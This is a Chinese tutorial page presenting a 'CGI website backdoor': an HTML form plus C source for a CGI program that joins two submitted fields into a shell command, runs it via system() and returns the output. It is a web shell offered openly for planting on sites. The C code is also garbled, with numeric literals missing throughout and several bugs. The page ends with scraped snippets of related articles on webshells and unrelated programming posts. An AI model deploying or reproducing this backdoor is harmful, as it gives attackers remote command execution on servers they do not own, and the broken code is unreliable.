51.cgi网站后门
- 运行截图:
- html开发:
<html>
<body>
<form id="form" name="form" method="post" action="../cgi-bin/run.cgi">
<p></p>
<input type="text" name="cmd1" id="user" >
<p></p>
<input type="text" name="cmd2" id="pass" >
<p></p>
<input type="submit" name="go" id="run" value="submit">
</form>
</body>
</html> - cgi开发
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <time.h> void main()
{
//显示html文本
printf("Cotent-type:text/html\n\n");
//获取表单信息
char szpost[] = { };
gets(szpost);
//输出表单信息
printf("%s", szpost); //对表单信息进行处理,把'+'转换成' '
char *pstart = szpost;
for(int i=;i<;i++)
{
if (szpost[i] == '+')
{
szpost[i] = ' ';
}
} //处理':'号
char *pos1 = strstr(szpost, "%3A");
if (pos1 != NULL)
{
*pos1 = ':';
*(pos1 + ) = ' ';
*(pos1 + ) = ' ';
} //处理'\'
pos1 = strstr(szpost, "%2F");
if (pos1 != NULL)
{
*pos1 = '\\';
*(pos1 + ) = ' ';
*(pos1 + ) = ' ';
} //获取第一个输入框的内容
char *p1 = strchr(szpost, '&');
if (*p1 != NULL)
{
*p1 = '\0';
}
//输出第一个输入框的内容
printf("%s\r\n", szpost+); //获取第二个输入框的内容
char *p2 = strchr(p1 + , '&');
if (*p2 != NULL)
{
*p2 = '\0';
}
//输出第二个输入框的内容
printf("%s\r\n",p1+); //整合成cmd指令
char cmd[] = { };
//生成随机数,写入到随机数文件中
time_t ts;
unsigned data = time(&ts);
srand(&ts);
int num = rand(); //整合cmd指令,并重定向到文件
sprintf(cmd, "%s %s >%d.txt", szpost + , p1 + , num);
//文件名
char filename[] = { };
//生成文件名
sprintf(filename,"%d.txt", num);
//执行指令
system(cmd);
//打开文件
FILE *pf = fopen(filename,"r");
//读取文件
while (!feof(pf))
{
char ch = fgetc(pf);
putchar(ch);
}
//关闭文件
fclose(pf);
}
51.cgi网站后门的更多相关文章
- 网站后门shell-----eval
我们先来看看网站被攻击的代码: <?php error_reporting(E_ERROR); unlink('user.php'); unlink('../member/login.php') ...
- thinkphp网站后门-发现后门(Webshell)文件
不知道能不能解决, 1.登录阿里云后台,找到后门文件删除 2.执行 中国镜像 composer config -g repo.packagist composer https://packagist. ...
- 动态网站技术CGI
递信息的规程.CGI规范允许Web服务器执行外部程序,并将它们的输出发送给Web浏览器,CGI将Web的一组简单的静三种主流的动态网站技术: ASP JSP PHP 除之外,此还要了解的动态网站技术 ...
- 阿里云提醒 网站被WebShell木马后门的处理过程
昨晚凌晨收到新客户的安全求助,说是阿里云短信提示,网站有webshell木马文件被植入,我们SINE安全公司立即成立,安全应急响应小组,客户提供了阿里云的账号密码,随即登陆阿里云进去查看到详情,登陆云 ...
- 360在线网站安全检测,web安全测试AppScan扫描工具,XSS常用的攻击手法
360在线网站安全检测,web安全测试AppScan扫描工具,XSS常用的攻击手法 如何做好网站的安全性测试 360网站安全检测 - 在线安全检测,网站漏洞修复,网站后门检测http://websca ...
- 企业网站被黑 dedecms漏洞修复办法
前段时间网站被黑了,从百度打开网站直接被劫持跳转到了彩票,du博网站上去,网站的首页index.html文件也被篡改成一些什么北京sai车,pk10,一些cai票的关键词内容,搞得网站根本无法正常浏览 ...
- 修复网站漏洞对phpmyadmin防止被入侵提权的解决办法
phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多一些,最近phpmysql爆出漏洞,尤其是弱口令,sql注入漏洞,都会导致mysql的数据账号密码被泄露,那么如 ...
- Python3 CGI编程实现教程
一.背景说明 虽然很久以前就听说“早期的网站很多通过cgi形式实现”.“C++可通过CGI形式编写网页”,日积月累对CGI也有了一些概念,但一直没真正见过一个实际运行的CGI网站,总归还是有些底气不足 ...
- 手把手教你查看网站遭受到的Web应用攻击类型
常见Web应用攻击类型有:webshell.SQL注入.文件包含.CC攻击.XSS跨站脚本攻击.敏感文件访问.远程命令.恶意扫描.代码执行.恶意采集.特殊攻击.其他攻击十二种攻击类型. 如何查看网站遭 ...
随机推荐
- python对MySQL进行添加修改删除以及字符串的操作
# coding=UTF-8 import MySQLdb def dbDperate(sql,param): "定义数据库的添加,修改和删除操作" #获取数据库的连接对象 con ...
- PostgreSQL Replication之第六章 监控您的设置(1)
在本书的前几章,您已经学习了各种复制以及如何配额制各种类型的场景.现在是时候通过增加监控来让您的设置更加可靠了. 在本章中,您将学习监控什么以及如恶化实施合理的监控车辆.您将学习: • 检查您的 XL ...
- caffe(2) 数据层及参数
要运行caffe,需要先创建一个模型(model),如比较常用的Lenet,Alex等, 而一个模型由多个屋(layer)构成,每一屋又由许多参数组成.所有的参数都定义在caffe.proto这个文件 ...
- grep常用命令讲解
grep大家应该并不陌生,但是这个命令你确定真的会用吗?ok,接下来我通过举例子的方式,带你看清grep的本质. 首先,把/etc/password的内容复制下来命令为1.txt吧,方便操作,哈哈~ ...
- C++11之decltype
使用场景 在C++中常常要用到非常长的变量名.假设已经有变量和你将使用的变量是一个类型.就可以使用decltypekeyword 来申明一样的类型变量. decltype原理 返回现有变量类 ...
- android 2048游戏实现
android 的2048小游戏完整实现:GridLayout布局(android 4.0及以上). 曾经做过一个2048的算法题,学了几天android,认为能够实现个安卓版的.也就动手写了个. 包 ...
- iOS xib View宽高不能改变
IOS - xib(Interface Builder,view) - can't change view size(view不能改变大小问题) 今天在试着swift语言写个demo,,当中遇到了这个 ...
- linux和unix的对照
在之前的博客中说到,linux是一个单一内核的操作系统,但它与传统的单一内核UNIX操作系统不同. 在普通单一内核系统中,全部内核代码都是被静态编译和链接的. 而在linux中,能够动态的装入和卸载内 ...
- thinkphp5项目--企业单车网站(三)
thinkphp5项目--企业单车网站(三) 项目地址 fry404006308/BicycleEnterpriseWebsite: Bicycle Enterprise Websitehttps:/ ...
- Hyper-v Server安装与配置-新加GUI界面配置工具介绍
650) this.width=650;" onclick='window.open("http://blog.51cto.com/viewpic.php?refimg=" ...